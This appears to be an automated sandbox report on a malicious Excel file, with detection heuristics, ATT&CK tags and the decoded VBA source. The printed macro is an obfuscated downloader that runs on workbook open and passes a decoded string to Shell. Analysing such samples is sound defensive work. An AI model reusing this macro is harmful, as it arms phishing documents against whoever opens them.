MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code automatically when the document is opened. The ClamAV heuristic identifies it as a downloader, suggesting it is designed to fetch and execute additional payloads. The VBA macro is the primary mechanism for this execution.
Heuristics 3
-
ClamAV: Doc.Downloader.00536d-6755246-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6755246-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3670 bytes |
SHA-256: 92b879f1bef319e8e253b4f48f024ac352580560ad99eef3f3b5f634924f60fb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
s1 = "2410"
start_main_dialog1 s1
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "dialog1"
Attribute VB_Base = "0{D4C5605C-74E4-430D-9758-CD27AF03860E}{AC8D0F7F-F6FB-4E42-960A-740F2A154DCB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Private Sub CommandButton2_Click()
End Sub
Private Sub ComboBox1_Change()
End Sub
Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1006"
End Sub
Private Sub TextBox1_Change()
replaceCharsInLeter
End Sub
Private Sub LastText_Change()
lev2 = "03"
lev1 = Len(dialog1.LastText)
fh = "04"
replaceCharsInLeter2 lev1
End Sub
Private Sub date1_Change()
End Sub
Private Sub TextBox2_Change()
End Sub
Attribute VB_Name = "Module1"
Sub chars_replace(Cell1, ByRef op)
st1 = 1
op = ""
replaceChars st1, op, Cell1
End Sub
Sub replaceChars(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
fine later, pointA, ch
idial = 1
dial_total_price ch, idial
st = ""
dial_pivot idial - 2, st
need = need + st
pointA = pointA + 1
replaceChars pointA, need, later
End If
End Sub
Sub replaceCharsInLeter()
Dim level As String
chars_replace dialog1.date1, level
dialog1.EditText1 = level
dialog1.LastText = dialog1.EditText1
End Sub
Sub start_main_dialog1(string1)
dialog1.TextBox1 = string1
End Sub
Sub dial_scrub_multi(ByRef b1, ByRef control, ActiveCellInTable)
log2 = 1
log2 = Len(dialog1.Text1)
If b1 < log2 Then
b = ""
fine dialog1.Text1, b1, b
If ActiveCellInTable <> b Then
b1 = b1 + 1
dial_scrub_multi b1, control, ActiveCellInTable
Else
control = b1
End If
End If
End Sub
Sub fine(ARG1, pointB, ByRef state_min)
s1 = Left(ARG1, pointB)
s1 = "" + s1
state_min = Right(s1, 1)
End Sub
Sub replaceCharsInLeter2(i)
With dialog1
If 429 - i = 0 Then Shell .LastText, i - 4 * 105 - 9
End With
End Sub
Sub dial_total_price(addper4, ByRef ARG2)
ARG2 = 0
sub2 = 1
dial_scrub_multi sub2, ARG2, addper4
End Sub
Sub dial_pivot(pointer, ByRef state_max)
state_max = ""
If pointer = -1 Then
pointer = -1
End If
If pointer < 1 Then
fine dialog1.Text1, Len(dialog1.Text1) + pointer, state_max
Else
fine dialog1.Text1, pointer, state_max
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.